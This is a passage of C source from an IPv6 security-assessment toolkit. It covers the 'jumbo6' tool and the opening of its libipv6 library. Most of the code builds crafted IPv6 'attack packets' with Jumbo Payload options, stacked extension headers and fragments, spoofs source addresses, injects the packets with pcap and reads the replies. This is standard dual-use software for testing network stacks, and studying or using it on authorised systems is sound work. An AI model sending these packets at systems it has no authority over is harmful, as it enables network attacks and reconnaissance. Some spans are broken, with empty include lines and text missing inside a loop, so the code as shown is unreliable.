exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Payload Size*/ icmp6psize= atoi(optarg); icmp6psize= (icmp6psize<<2) >> 2; /* The Redirected Header has a granularity of 8 bytes */ icmp6psize_f= 1; break; case 'q': /* IPv6 Payload Length */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ ip6length = ul_res; ip6length_f=1; } break; case 'Q': /* Jumbo Payload Length */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ jplength = ul_res; jplength_f=1; } break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("jumbo6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(idata.listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); srandom(time(NULL)); if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=1; if(!idata.ether_flag){ randomize_ether_addr(&idata.ether); idata.ether_flag=1; } if(!idata.ip6_local_flag){ ether_to_ipv6_linklocal(&idata.ether, &idata.ip6_local); } if(!sleep_f) nsleep=QUERY_TIMEOUT; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for receiving Neighbor Solicitations, ICMPv6 Echo Responses, and ICMPv6 Parameter Problem */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a packet if a IPv6 Destination Address was specified */ if(idata.dstaddr_f){ FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); while(1){ curtime=time(NULL); if(!loop_f && (curtime - start) >= QUERY_TIMEOUT){ break; } if((curtime - lastecho) >= nsleep){ lastecho=curtime; puts("Sending ICMPv6 Echo Request....\n"); if(send_packet(&idata, NULL, NULL) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } } rset= sset; #if !defined(sun) && !defined(__sun) timeout.tv_usec=0; timeout.tv_sec= nsleep; #else timeout.tv_usec=10000; timeout.tv_sec= 0; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, Neighbor Solicitation, or ICMPv6 Error */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(!localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &idata.srcaddr)){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; /* Do a preliminar validation check on the ICMPv6 packet (packet size, Source Address, and Destination Address). */ if(!valid_icmp6_response(&idata, pkthdr, pktdata)){ continue; } switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: print_icmp6_echo(&idata, pkthdr, pktdata); break; case ICMP6_PARAM_PROB: print_icmp6_error(&idata, pkthdr, pktdata); break; } } } } } } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: print_icmp6_info() * * Print information about a received ICMPv6 Echo Response packet */ void print_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("Response from %s\n", pv6addr); } /* * Function: print_icmp6_error() * * Print information about a received ICMPv6 error message */ void print_icmp6_error(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("Response from %s: ICMPv6 Parameter Problem ", pv6addr); switch(pkt_icmp6->icmp6_code){ case ICMP6_PARAMPROB_HEADER: printf("Code 0 (Erroneous Header field), Pointer: %lu\n", (LUI) ntohl(pkt_icmp6->icmp6_pptr)); break; case ICMP6_PARAMPROB_NEXTHEADER: printf("Code 1 (Unrecognized Next Header type), Pointer: %lu\n", (LUI) ntohl(pkt_icmp6->icmp6_pptr)); break; case ICMP6_PARAMPROB_OPTION: printf("Unrecognized IPv6 option), Pointer: %lu\n", (LUI) ntohl(pkt_icmp6->icmp6_pptr)); break; } } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; /* * We include a Hop by Hop Options header that will include the Jumbo Payload option. * The user may specify additionaly HBH option headers. */ *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; ptr++; *ptr= 0; /* HBH len */ ptr++; *ptr= IP6OPT_JUMBO; /* Option type */ ptr++; *ptr= 4; /* Option length */ ptr++; jplengthptr= (uint32_t *) ptr; ptr+=4; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); for(i=0; i< (icmp6psize/4); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ ptr= startofprefixes; if(!fragh_f){ if(ip6length_f) ipv6->ip6_plen= htons(ip6length); else ipv6->ip6_plen= htons(0); if(jplength_f) *jplengthptr= htonl(jplength); else *jplengthptr= htonl((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; fjplengthptr= (uint32_t *) (fptr + sizeof(struct ether_header) + sizeof(struct ip6_hdr) + 3); /* We copy everything from the Ethernet header till the end of the Unfragmentable part */ memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); /* Check whether there is still room to add a Fragmentation Header */ if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } /* Copy the Fragmentation Header */ memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if(ip6length_f) fipv6->ip6_plen = htons(ip6length); else fipv6->ip6_plen= htons(0); if(jplength_f) *fjplengthptr= htonl(jplength); else *fjplengthptr= htonl((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ return(0); } /* * Function: usage() * * Prints the syntax of the jumbo6 tool */ void usage(void){ puts("usage: jumbo6 -d DST_ADDR [-i INTERFACE] [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-A HOP_LIMIT] [-H HBH_OPT_HDR_SIZE] \n" " [-U DST_OPT_U_HDR_SIZE] [-y FRAG_SIZE] [-u DST_OPT_HDR_SIZE]\n" " [-q IPV6_LENGTH] [-Q JUMBO_LENGTH] [-P PAYLOAD_SIZE] [-j PREFIX[/LEN]]\n" " [-k PREFIX[/LEN]] [-J LINK_ADDR] [-K LINK_ADDR] [-b PREFIX[/LEN]]\n" " [-g PREFIX[/LEN]] [-B LINK_ADDR] [-G LINK_ADDR] [-L | -l] [-z SECONDS]\n" " [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the jumbo6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("jumbo6: Security assessment tool for attack vectors based on IPv6 jumbo packets\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --ipv6-length, -q IPv6 Payload Length\n" " --jumbo-length, -Q Jumbo Payload Length\n" " --payload-size, -P ICMPv6 payload size\n" " --loop, -l Send periodic Jumbo messages\n" " --sleep, -z Pause between sending Redirect messages\n" " --listen, -L Listen to incoming packets\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the jumbo6 tool\n" "\n" "Programmed by Fernando Gont on behalf of CPNI (http://www.cpni.gov.uk)\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "jumbo6: Security assessment tool for attack vectors based on IPv6 Jumbo Payloads\n"); if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else{ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, \ ((idata->srcprefix_f)?" (randomized)":" (automatically selected)")); } else puts("Ethernet Source Address: Automatically selected for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } if(idata->srcaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcaddr_f != TRUE)?" (automatically selected)":"")); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; icaplen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ icmp6psize) ){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; case ICMP6_PARAM_PROB: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ icmp6psize) ){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } return 1; } ipv6toolkit-2.0+ds.1/tools/jumbo6.h000066400000000000000000000001111254360455000171160ustar00rootroot00000000000000/* * Header file for the jumbo6 tool * */ #define QUERY_TIMEOUT 2 ipv6toolkit-2.0+ds.1/tools/libipv6.c000066400000000000000000003425561254360455000173100ustar00rootroot00000000000000/* * libipv6 : An IPv6 library for Linux, Mac OS, and BSD systems * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make libipv6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #include #include #include /* For datalink structure */ #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) || defined(__sun) || defined(sun) #include #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include "libipv6.h" #include "ipv6toolkit.h" /* IPv6 Address Resolution */ sigjmp_buf env; unsigned int canjump; /* pcap variables */ char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program pcap_filter; #ifdef __linux__ /* Netlink requests */ struct nlrequest{ struct nlmsghdr nl; struct rtmsg rt; char buf[MAX_NLPAYLOAD]; }; #endif /* * Function: is_service_port() * * Check whether a short int is in the list of service ports (in hexadecmal or decimal "notations") */ unsigned int is_service_port(uint16_t port){ unsigned int i; uint16_t service_ports_hex[]={0x21, 0x22, 0x23, 0x25, 0x49, 0x53, 0x80, 0x110, 0x123, 0x179, 0x220, 0x389, \ 0x443, 0x547, 0x993, 0x995, 0x1194, 0x3306, 0x5060, 0x5061, 0x5432, 0x6446, 0x8080}; uint16_t service_ports_dec[]={21, 22, 23, 25, 49, 53, 80, 110, 123, 179, 220, 389, \ 443, 547, 993, 995, 1194, 3306, 5060, 5061, 5432, 6446, 8080}; for(i=0; i< (sizeof(service_ports_hex)/sizeof(uint16_t)); i++){ if(port == service_ports_hex[i]) return(1); } for(i=0; i< (sizeof(service_ports_hex)/sizeof(uint16_t)); i++){ if(port == service_ports_dec[i]) return(1); } return(0); } /* * Function: zero_byte_iid() * * Counts the number of zero-bytes in an IPv6 Interface ID */ unsigned int zero_byte_iid(struct in6_addr *ipv6){ unsigned int i, nonzero=0; for(i=8; i<=15; i++){ if(ipv6->s6_addr[i] == 0) nonzero++; } return(nonzero); } /* * Function: decode_ipv6_address() * * Decodes/analyzes an IPv6 address */ void decode_ipv6_address(struct decode6 *addr){ uint16_t scope; if(IN6_IS_ADDR_UNSPECIFIED(&(addr->ip6))){ addr->type= IPV6_UNSPEC; addr->subtype= IPV6_UNSPEC; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_MULTICAST(&(addr->ip6))){ addr->type= IPV6_MULTICAST; addr->iidtype= IID_UNSPECIFIED; addr->iidsubtype= IID_UNSPECIFIED; if((addr->ip6.s6_addr32[0] & htonl(0xff000000)) == htonl(0xff000000)){ if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff00)){ addr->subtype= MCAST_PERMANENT; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff100000)){ addr->subtype= MCAST_NONPERMANENT; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff200000)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff300000)){ addr->subtype= MCAST_UNICASTBASED; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff400000)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff500000)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff600000)){ 